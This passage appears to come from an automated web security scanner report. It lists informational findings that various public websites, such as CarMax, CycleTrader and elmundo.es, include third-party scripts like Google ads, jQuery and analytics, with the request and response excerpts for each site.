<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.bymnews.co
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.749. http://www.carmax.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carmax.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.750. http://www.cdearth.com/photo-image-editor.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdearth.com
Path:	/photo-image-editor.htm

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.cdearth.com&size=M&use_flash=NO&use_transparent=YES&lang=en

Request

GET /photo-image-editor.htm HTTP/1.1
Host: www.cdearth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.751. http://www.cloudaccess.net/trial.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/trial.html

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...
<div id="demoCaptcha">

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB"></script>
...[SNIP]...

21.752. http://www.codylindley.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.codylindley.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET / HTTP/1.1
Host: www.codylindley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:14:37 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 7535

<!DOCTYPE html>
<html>
<head>
<link href="/screen.css" rel="stylesheet" media="all" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="author" content="Cody Lindley
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.753. http://www.commercialtrucktrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commercialtrucktrader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 62951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Trucks for Sale | Freightliner, Kenworth, Peterbilt, new Trucks and used trucks | Comme
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.754. http://www.commercialtrucktrader.com/research/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commercialtrucktrader.com
Path:	/research/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:05 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 83367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Truck Research and Commercial Truck News & Reviews - CommercialTruckTrader.com</title>

...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.755. http://www.commercialtrucktrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commercialtrucktrader.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 99484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Sell Your New or Used Commercial Truck and Trailer - CommercialTruckTrader.com</title>

...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.756. http://www.cycletrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:58:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 93348

<!DOCTYPE html>
<html>
<head>
   <title>Motorcycles - Scooters, Dirt Bikes, Choppers, Sport Bikes, and Other Motorcycles for Sale - Cycle Trader.com</title>
   <meta http-equiv="C
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.757. http://www.cycletrader.com/find/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/find/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 135290


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Find New and Used Motorcycles for Sale - CycleTrader.com</title>
   <meta name="descripti
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.758. http://www.cycletrader.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 33542


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Motorcycle Resources: Finance Insurance and More - CycleTrader.com</title>
   <meta name=
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.759. http://www.cycletrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cycletrader.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29864


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Motorcycle - CycleTrader.com</title>
   <meta name="description" co
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.760. http://www.dagondesign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dagondesign.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.dagondesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://www.dagondesign.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xf
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.761. http://www.dedipower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dedipower.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://t.trackedlink.net/_dmpt.js
http://ultra1.clickchatsold.com/D6/asuk.js

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ultra1.clickchatsold.com/D6/asuk.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c9a06fe61633f20"></script>
...[SNIP]...
</script>

<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...

21.762. http://www.digitalia.be/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitalia.be
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R477195302; path=/; expires=Thu, 27-Jan-2011 04:19:38 GMT
Date: Mon, 24 Jan 2011 16:04:51 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53983

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>digitalia.be</title>
   <meta name="DC.Language" content="fr" />
   <meta nam
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Recherche sur digitalia.be" href="/opensearch.xml" />
   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

21.763. http://www.digitaltips.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitaltips.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://d.yimg.com/mi/eu/ywa.js

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:13:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15408
Content-Type: text/html
Expires: Tue, 25 Jan 2011 13:12:49 GMT
Set-Cookie: ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

21.764. http://www.directstartv.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.directstartv.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://assets.percentmobile.com/percent_mobile.js
http://d.yimg.com/mi/ywa.js
http://edge.quantserve.com/quant.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...

   <script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

21.765. http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/dynamicindex1/ddlevelsmenu/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /dynamicindex1/ddlevelsmenu/ HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:11 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 25724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.766. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.767. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebayinc.com
Path:	/content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=ebayinc&apiKey=R_e1b5bff47ec217bf3977d79a2b226bc3

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Set-Cookie: JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 19418

                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="/assets/css/print.css" />
               <script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=ebayinc&apiKey=R_e1b5bff47ec217bf3977d79a2b226bc3"></script>
...[SNIP]...

21.768. http://www.echochrist.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.echochrist.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.echochrist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:14:39 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 13522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:ice="http://ns.adobe.com/incontextediting
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.769. http://www.elmundo.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elmundo.es
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://active.cache.el-mundo.net/js/nielsen.js
http://active.cache.el-mundo.net/js/s_codeE.js
http://estaticos.elmundo.es/elmundo/js/carrusel.js
http://estaticos.elmundo.es/js/accordian.js
http://estaticos.elmundo.es/js/comunes.js
http://estaticos.elmundo.es/js/pestanas_portal.js
http://estaticos.elmundo.es/js/reproductor_imagenes.js

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 25 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache
X-Accel-Cache-Control: no-cache
Set-Cookie: ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
Content-Length: 148754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://estaticos.elmundo.es/js/accordian.js"></script>
<script type="text/javascript" src="http://estaticos.elmundo.es/js/pestanas_portal.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://active.cache.el-mundo.net/js/nielsen.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="JavaScript" src="http://estaticos.elmundo.es/js/comunes.js"></script>
...[SNIP]...
<div class="reproductor sin_alineacion">
<script language="javascript" type="text/javascript" src="http://estaticos.elmundo.es/js/reproductor_imagenes.js"></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://estaticos.elmundo.es/elmundo/js/carrusel.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://active.cache.el-mundo.net/js/s_codeE.js"></script>
...[SNIP]...

21.770. http://www.equipmenttraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.equipmenttraderonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
